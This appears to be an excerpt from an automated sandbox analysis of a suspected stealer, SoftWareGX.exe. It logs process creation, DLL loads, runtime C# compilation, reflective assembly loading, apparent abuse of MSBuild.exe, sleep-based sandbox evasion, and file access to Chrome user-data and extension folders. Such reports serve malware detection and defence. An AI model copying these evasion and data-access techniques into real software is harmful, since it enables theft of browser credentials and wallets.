                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6820 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6748 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: rasapi32.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: rasman.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: rtutils.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: wininet.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: dbghelp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: sspicli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: iertutil.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: profapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: winhttp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ndfapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wdi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: duser.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: atlthunk.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Google Drive.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: YouTube.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Sheets.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Gmail.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Slides.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Docs.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: SoftWareGX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SoftWareGX.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: SoftWareGX.exeStatic file information: File size 10584064 > 1048576
                Source: SoftWareGX.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xa0e000
                Source: SoftWareGX.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: SoftWareGX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: MSBuildsers\user\AppData\Local\Temp\yomkssf4\yomkssf4.pdb source: SoftWareGX.exe, 00000005.00000002.1304719584.0000000002019000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: q6C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.pdb source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: q6C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.pdb| source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: q6C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.pdb| source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: q6C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.pdb source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                Source: 5.2.SoftWareGX.exe.3cd94d0.0.raw.unpack, ManagesModules.cs | .Net Code: DataModule System.Reflection.Assembly.Load(byte[])
                Source: 5.2.SoftWareGX.exe.6110000.4.raw.unpack, ManagesModules.cs | .Net Code: DataModule System.Reflection.Assembly.Load(byte[])
                Source: m3uz1vzd.dll.6.dr, ManagesModules.cs | .Net Code: DataModule System.Reflection.Assembly.Load(byte[])
                Source: SoftWareGX.exe | Static PE information: 0xB9EE827D [Tue Nov 6 08:25:33 2068 UTC]
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline"
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0043BAE1 push es; ret 15_2_0043BAE3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0043CB8C push 00000046h; iretd 15_2_0043CB8F
                Source: SoftWareGX.exe, aNQaxxDiYjXg.cs | High entropy of concatenated method names: 'MsYIiHCKOVg', 'AEIcapmlYwreYrwbho', 'grtEQPnEWQeGyOSsVquAnysLp', 'pxnOSxlzAtLoJePZLWYzXO', 'IbsfQgxrfqgPuy', 'ztQvAnOyfhhCblhxUz', 'dxdlOMPOTTnPkakgWUGEGfztEkAq', 'OAifdjgfkNwmDDXqVnAD', 'TLJetgkhOgLr', 'drEVxryILBScHeTHJfUUrx'
                Source: SoftWareGX.exe, uBQRQemRwragayxWIgNspKbnCcaXv.cs | High entropy of concatenated method names: 'IjUmeHhCBOyXrjvVvfONTPF', 'jPPhvaEdyPCFnNAkJlNs', 'BeQPfkZSpjPvYqqBenLtJZo', 'CYawTJzZuySnyVztOHTAHtpzd', 'JjaSPmSzbwZLvheEztVywB', 'AQYdCEVeAxZE', 'ahfneZThAlkikgxqxo', 'YMclrJgYWZTZSKJJSQaYw', 'vJnhTmqycRrvnmNN', 'bxqWmohFigqxoF'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.dll

                Boot Survival

                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: SoftWareGX.exe PID: 6924, type: MEMORYSTR
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Memory allocated: 22D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Memory allocated: 3CC0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Memory allocated: 3AE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Thread delayed: delay time: 600000
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Thread delayed: delay time: 599873
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Thread delayed: delay time: 599761
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Thread delayed: delay time: 599650
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Thread delayed: delay time: 599540
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Window / User API: threadDelayed 795
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6340 | Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6340 | Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6340 | Thread sleep time: -599873s >= -30000s
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6336 | Thread sleep count: 795 > 30
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6340 | Thread sleep time: -599761s >= -30000s
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6340 | Thread sleep time: -599650s >= -30000s
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6340 | Thread sleep time: -599540s >= -30000s
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 5488 | Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\SoftWareGX.exe TID: 6916 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\timeout.exe TID: 7312 | Thread sleep count: 83 > 30
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00421A6B FindFirstFileA,15_2_00421A6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00420AD3 FindFirstFileA,15_2_00420AD3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0040F379 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,15_2_0040F379
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0040BC0C FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,15_2_0040BC0C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00422DC5 FindFirstFileA,FindNextFileA,15_2_00422DC5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0040A5E0 FindFirstFileA,FindNextFileA,CopyFileA,DeleteFileA,memset,CopyFileA,DeleteFileA,memset,15_2_0040A5E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00401590 FindFirstFileA,15_2_00401590
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0040CF73 FindFirstFileA,FindNextFileA,15_2_0040CF73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0041FF89 FindFirstFileA,memset,memset,memset,memset,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,15_2_0041FF89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004199AE GetSystemInfo,15_2_004199AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
